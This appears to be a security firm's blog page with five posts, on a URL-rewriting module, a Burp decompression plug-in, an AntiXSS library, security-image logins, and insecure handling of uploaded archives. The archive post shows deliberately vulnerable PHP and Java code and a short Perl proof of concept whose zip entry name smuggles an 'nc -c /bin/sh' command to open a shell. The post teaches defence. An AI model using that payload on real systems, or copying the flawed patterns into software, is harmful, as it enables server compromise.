RSS Feed

Bi-Directional HTTP Transformation

The ability to transform and inspect HTTP data as it flows in and out of a web application has many practical uses (both inside and outside of security). On IIS, this capability was historically restricted to ISAPI filters. Http Modules written in ASP.NET have always allowed processing of requests and responses to and from an ASP.NET application, but with the advent of IIS7 and the integrated ASP.NET pipeline, Http Modules written in ASP.NET now have access to virtually all stages of request processing (including those not handled by ASP.NET).

Transformer.NET is an Http Module designed for on-the-fly inbound and outbound url rewriting. Apache's mod_rewrite, used to manipulate inbound request urls, is arguably one of the most popular Apache modules around. While there have been several ports of mod_rewrite to IIS (with implementations ranging from Http Modules to ISAPIs), they all share one shortcoming in common with their Apache predecessor: They only rewrite requests and not urls within outbound responses (such as links that are generated within an HTML page).

This has long been a pet peeve of mine. If you want to use mod_rewrite, you typically need to update the underlying website source code so that the hyperlinks within the application point to the "rewritten" urls. This can be a major effort and inconvenience if the site is already written, and even worse, it may not be possible for 3rd party or COTS web applications.

The initial beta release of Transformer.NET differs from previous rewrite modules because it supports bi-directional (inbound and outbound) url rewriting. Bi-directional rewriting eliminates the need to modify the underlying website code, which is great for legacy or third party web sites and applications. In addition to the ability to parse response content (such as HTML), Transformer.NET also includes the following two key internal mechanisms:


Normalization Engine

Normalizing all urls into their absolute representation quickly became essential for two reasons. First, the module needs to be able to apply configured rules to a given url in any form. So a rule for "/foo/bar.htm" might need to be applied to "bar.htm", "../bar.htm", or any other number of relative url variants depending on the path of the rendering page. Second, if "/foo/bar.htm" is rewritten to "/fake/bar.htm", then suddenly all of the relative links on the page (images, css, etc) will be broken. Replacing a relative link on a rewritten page with its absolute counterpart is essential.

Internal Url Cache

Like anything in the software world, performance is important. Inspecting and transforming very large responses when lots of rules have been defined can be a real performance killer. To help minimize performance impact, Transformer.NET maintains an internal cache of all rewrites that are performed. This eliminates un-needed processing the next time the url is rendered on a page. The net result is that as more requests are parsed by the module, performance impact continually decreases. To avoid stale cache entries, the cache gets cleared any time a change is made to a rewrite rule.

The bi-directional rewriting capability of Transformer.NET was really an initial "proof-of-concept" for us to start building bi-directional HTTP inspection and transformation solutions to solve some very interesting web application security problems.

Unlike Apache's mod_rewrite, Transformer.NET does not implement conditional rewrites (ala mod_rewrite's RewriteCond) so it is not intended to be a total port. The current beta version can be downloaded from our tools page. Transformer works on IIS6 (limited to ASP.NET applications) and with any site running on IIS7. A detailed user guide is included with the download.


A "Deflate" Burp Plug-In

I wrote a plug-in for Burp Proxy that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression data formats. This arose out of an immediate need on a recent web application security assessment.

Inspecting the HTTP traffic between client and server of the application under review, it appeared that most of the response bodies were compressed and unfortunately not being decoded by Burp (despite the "unpack gzip" option being enabled). The client, a Java applet, relied on response data for a lot of interesting functionality (including access control) and having the ability to easily view and manipulate the contents in plaintext before being received by the applet was clearly beneficial (let's ignore the obvious client-side security issue here ' this is a topic for another discussion).

As I mentioned earlier, it appeared the response content was compressed; however the expected Content-Encoding HTTP response header was not present. Inspection of the de-compiled Java applet code confirmed that compression was being performed with the and classes. At present, Burp Proxy does not support the ZLIB and DEFLATE compression formats (only GZIP compression is supported).

Burp is an essential tool in any web app testing toolkit and extending its functionality to inflate "deflate" compressed response content via the handy IBurpExtender interface seemed a worthwhile contribution. I hope others find the plug-in useful as well; at a minimum, it will be useful when the application returns for a round of regression testing.

The Burp plug-in can be downloaded here.

Also included with the download is an example servlet called "DeflateTestServlet" for generating HTTP responses bodies in the RFC1950 and RFC1951 compressed formats for testing the plug-in.

Also, here's a good link that may help clarify your understanding of the compression formats used with HTTP.


Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. They often provide exploitable attack vectors for compromising the server, application and/or end-user. In this post, I focus on insecure handling of uploaded archive files ' something I've seen repeatedly. From my experience, most of the applications vulnerable to this flaw do a fairly good job vetting the uploaded file itself, but fail to apply the same scrutiny to the packaged files. Consider the following PHP code snippet:

Example 1:

if (isFileValidArchive())
$files = getSortedListOfFilesFromValidatedArchive();

foreach ($files as $filename)
$ext = substr($filename, strrpos($filename, '.') + 1);
//only handle .doc files
if ($ext == "doc")
$cmd = "/usr/bin/unzip -j -o " .
. "\"" . $filename . "\" -d /tmp/uploads";
// process results

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (i.e. the name of a file packaged within a user uploaded .zip file) creates an exploitable attack vector ' in this case, arbitrary command execution. Given the attacker's operating system is likely to prevent certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above, zip compression libraries are a good solution because they provide functionality to create and package archives in memory, which are obviously not bound by OS file system constraints. Allowing special characters in a file name is likely not an oversight as it appears in line with the .ZIP File Format Specification. It's also worth noting that the spec permits the use of alternate character encodings, which could be leveraged by an attacker to bypass potential blacklist filtering mechanisms. The following Perl script uses this zip compression library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh 8888 & \"bar.doc","junk");

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications could be native or 3rd party zip compression APIs, such as PHP Zip File Extensions or the Java package However, even when these are used, developers still find a way to do it insecurely. Consider Example 2 which is a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
while (zipEntries.hasMoreElements())
ZipEntry zipEntry = zipEntries.nextElement();
File packagedFile = new File("/tmp/uploads", zipEntry.getName());
// Create "packagedFile" on file system and
// Copy contents of "zipEntry" into it

Again, the attacker controls everything within the zip file. Embedding characters such as ../ into the name of the packaged file, an attacker could traverse out of "/tmp/uploads" and force the application to write the packaged file into any location, such as the web root directory. A simple "cmd.jsp" file would allow the attacker to execute arbitrary commands on the web server.

How can developers harden their applications so they are not vulnerable to similar mistakes? First, ensure the application is secured with appropriate server-side controls when handling file uploads, i.e.

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • etc, etc, etc

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.


AntiXSS for Java

I've just uploaded the latest version of AntiXSS for Java (version 0.02) to the GDS Tools page. What is AntiXSS for Java? Its a port to Java of the Microsoft Anti-Cross Site Scripting (AntiXSS) v1.5 library for .NET applications.

For those not familiar with the Microsoft AntiXSS library, it is an output encoding library for avoiding Cross Site Scripting vulnerabilities. Specifically it is intended to safely encode information written to the user's browser within a specific context (i.e. if writing a string into the HTML of a page, you need to use the correct function - HtmlEncode). Unlike some other solutions the library implements a white listing approach, and encodes everything except characters known to be harmless. For example, the string <script> will be HTML encoded as &#60;script&#62;.

AntiXSS for Java was largely written as an educational exercise on my part, and as such the library should be considered "beta quality", however it should be fairly usable for most applications. The library requires Java 1.4 or higher, but has no other prerequisites.


  • AntiXSS for Java comes as a source package, or alternatively you can just download the compiled Jar file. An Ant buildfile and JUnit tests are included with the source code.
  • Put AntiXSS.jar somewhere in your CLASSPATH
  • In your code, import com.gdssecurity.utils.AntiXSS
  • All of the output filtering methods are implemented statically, so just wrap your calls to output functions in a call to one of the filtering methods (identical to the methods in the Microsoft library):
    1. HtmlEncode() - a string to be used in HTML. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal HTML entity format (i.e. < is encoded as &#60;).
    2. UrlEncode() - a string to be used in a URL. This method will return characters a-z, A-Z, 0-9, full stop, dash, and underscore unencoded, and encode all other characters in short hexadecimal URL notation for non-unicode characters (i.e. < is encoded as %3c), and as unicode hexadecimal notation for unicode characters (i.e. %u0177).
    3. HtmlAttributeEncode() - a string to be used in an HTML attribute. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal HTML entity format (i.e. < is encoded as &#60;).
    4. JavaScriptEncode() - a string safe to use directly in JavaScript. This method will return characters a-z, A-Z, space, 0-9, full stop, comma, dash, and underscore unencoded, and encode all other characters in a 2 digit hexadecimal escaped format for non-unicode characters (e.g. \x17), and in a 4 digit unicode format for unicode characters (e.g. \u0177).
    5. VisualBasicScriptEncodeString() - a string to use directly in VBScript. This method will return characters a-z, A-Z, space, 0-9, full stop, comma, dash, and underscore unencoded (each substring enclosed in double quotes), and encode all other characters in concatenated calls to chrw(). e.g. foo' will be encoded as "foo"&chrw(39).
    6. XmlEncode() - a string to be used in XML. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other characters in decimal entity format (i.e. < is encoded as &#60;).
    7. XmlAttributeEncode() - a string to be used in an XML attribute. This method will return characters a-z, A-Z, 0-9, full stop, comma, dash and underscore unencoded, and encode all other character in decimal entity format (i.e. < is encoded as &#60;).

For those of you familiar with output encoding, this library is functionally the same as the OWASP Reform library by Michael Eddington, which is not too surprising as I believe Michael was involved in developing the Microsoft AntiXSS library.

Any feedback, and especially bug reports, welcome.


Yet Another Flawed Authentication Scheme

It seems like every day I hear about a new web-based authentication technique intended to enhance user security and/or thwart phishing scams. This is especially common in the banking world, where most applications are starting to use strong two-factor authentication. Unfortunately for most of the larger consumer web applications, implementing strong multi-factor authentication (i.e. Smart-cards or SecureID) is just not cost effective or practical when you have several million users. As a result, these applications must resort to other creative ways to strengthen their authentication.

One increasingly popular practice is the use of security images (known as "watermarks") to thwart phishing scams. For those not familiar with this concept (generically known as site-to-user authentication), it's supposed to like this:

During registration, the user selects (or is assigned) a specific image. The image is one of potentially hundreds of possible images and is intended to help user distinguish the real web-site from an impostor. The actual act of authenticating to the website is split into the following three steps:

  • Step 1: The user submits their username (only) to the website
  • Step 2: The website shows the user their personal "watermark" image, allowing them to verify that they are at the correct site.
  • Step 3: If the watermark image is correct, the user should enter his/her password to complete the login process. If the watermark image is not correct (or not shown), the user should not proceed as they are likely not at the correct website.

The general concept is pretty simple, and was pioneered by PassMark (acquired by RSA/EMC) several years ago. The concept (and PassMark) has been the subject of much scrutiny by both the FFIEC and security researchers in recent years, who have even published papers outlining various ways in which this scheme can be abused and subverted. What I find most interesting is that, in addition to all of the potential technical flaws that have been identified with Passmark (and similar concepts), it seems to suffer from an even more critical and fundamental flaw ' that most users just don't understand it.

A study published earlier this year found that 97% of people who use an image oriented site-to-user authentication scheme (as described above) still provided their password to an imposter website even though the correct security image was not shown. Even worse, it seems that some of the companies who implement this authentication scheme don't completely understand it. Consider the following real-life example:

Like many folks this holiday season, I found myself at a department store checkout counter faced with the question that every retail clerk is programmed to ask ("Would you like to save an additional 15% today by opening up a new credit card?"). Normally I decline this offer while the clerk is in mid-sentence; however, on this day I proceeded to open an account.

A few days later, I went online to pay my bill and quickly noticed the site touting its *high security* (this seems to be the marketing norm these days). During the registration process, the site forced me to pick a "Security Image" that is used to protect me from phishing scams (ala PassMark). Knowing how this process is supposed to work, you can imagine my surprise when my subsequent login to the website looked like this:

Screen 1: Login Screen (requesting user-name and password)

Login Page

Screen 2: After authentication (displays my security image)

After Login

What's wrong with these pictures? Unfortunately they don't show me my security image until after I have completely authenticated to the website (instead of before I provided my password)! Clearly there seems to be a lack of understanding and/or education somewhere on the other side.

A quick survey of some non-technical friends and relatives during the holidays also served to further confirm my suspicions. While all of them use at least one banking/bill-pay website that incorporates the use of a security image ("Oh yea, I have a special picture that they show me every time I log in"), not one of them could explain what the image was for or even whether it gets shown to them before or after they provide their password.

The takeaway here is that (not surprisingly) end-user awareness still, and likely always will be, a fundamental component to the success of any good security measure. There is little point in implementing a new security mechanism (especially one that depends on the user understanding it) unless the appropriate steps have been taken to ensure that everyone has been properly educated.